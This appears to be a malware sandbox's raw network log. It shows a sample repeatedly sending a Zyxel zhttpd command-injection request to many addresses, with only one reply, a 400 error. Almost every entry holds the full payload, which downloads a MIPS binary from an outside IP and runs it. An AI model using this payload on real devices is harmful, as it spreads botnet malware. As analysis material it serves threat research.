                                                      Feb 2, 2024 06:35:56.710077047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5406192.168.2.145726442.42.111.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710130930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5407192.168.2.1453074206.169.16.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710185051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5408192.168.2.1436636204.155.41.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710211992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5409192.168.2.1453934125.72.178.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710268974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5410192.168.2.145344817.223.231.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710308075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5411192.168.2.145479217.55.54.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710357904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5412192.168.2.143388267.17.239.11443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710395098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5413192.168.2.1446396183.221.158.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710433006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5414192.168.2.1455912109.217.90.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710474968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5415192.168.2.143824454.242.13.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710517883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5416192.168.2.1457752109.56.67.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710561037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5417192.168.2.1460572192.50.81.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710604906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5418192.168.2.1449664193.40.49.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710664988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5419192.168.2.144801491.54.44.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710710049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5420192.168.2.14488562.68.213.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710755110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5421192.168.2.146031257.48.219.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710778952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5422192.168.2.1435278218.255.191.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710836887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5423192.168.2.144370649.36.207.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710879087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5424192.168.2.145814684.159.152.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710926056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5425192.168.2.145192865.149.160.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.710974932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5426192.168.2.1433474157.26.207.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711019039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5427192.168.2.1434398143.200.16.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711061001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5428192.168.2.1459260140.199.113.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711100101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5429192.168.2.145483262.195.10.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711114883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5430192.168.2.1460468206.214.105.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711148024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5431192.168.2.144661637.84.161.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711196899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5432192.168.2.1454320100.214.50.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711456060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5433192.168.2.145367018.101.229.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.711674929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5434192.168.2.1434894218.159.12.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.714936018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5435192.168.2.143992686.142.27.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.714988947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5436192.168.2.1453460164.214.70.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.715054035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5437192.168.2.1444306134.160.29.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.715075016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5438192.168.2.1454878160.11.238.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.715131044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5439192.168.2.14405248.170.163.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.715162992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5440192.168.2.1450168209.75.171.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.715213060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5441192.168.2.1448336104.163.56.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.715271950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5442192.168.2.1439274118.216.160.1078080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:56.827117920 CET268INHTTP/1.0 400 Bad Request
                                                      Server: httpd
                                                      Date: Fri, 02 Feb 2024 05:35:56 GMT
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5443192.168.2.1450078150.202.220.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.724806070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5444192.168.2.1434334212.227.96.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.724847078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5445192.168.2.143366693.250.122.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.724889040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5446192.168.2.1438030114.238.64.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.724926949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5447192.168.2.143546690.118.5.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.724978924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5448192.168.2.1454984104.95.73.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725012064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5449192.168.2.1441886223.193.231.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725086927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5450192.168.2.1456532208.182.86.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725126982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5451192.168.2.1450404169.8.196.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725178957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5452192.168.2.1434210167.68.97.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725213051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5453192.168.2.1451350144.112.34.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725253105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5454192.168.2.1457468156.37.130.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725303888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5455192.168.2.1437902190.83.68.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725332975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5456192.168.2.143638812.42.137.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725367069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5457192.168.2.145098464.73.176.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725395918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5458192.168.2.144211470.157.147.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725440025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5459192.168.2.143615814.136.163.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725474119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5460192.168.2.144113461.4.6.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725517988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5461192.168.2.143750831.37.129.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725549936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5462192.168.2.1440062142.210.134.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725600004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5463192.168.2.145884486.108.229.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725703001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5464192.168.2.143893439.37.255.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725753069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5465192.168.2.1459570130.176.158.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:57.725786924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5466192.168.2.1451510173.148.72.222443
                                                      TimestampBytes transferredDirectionData
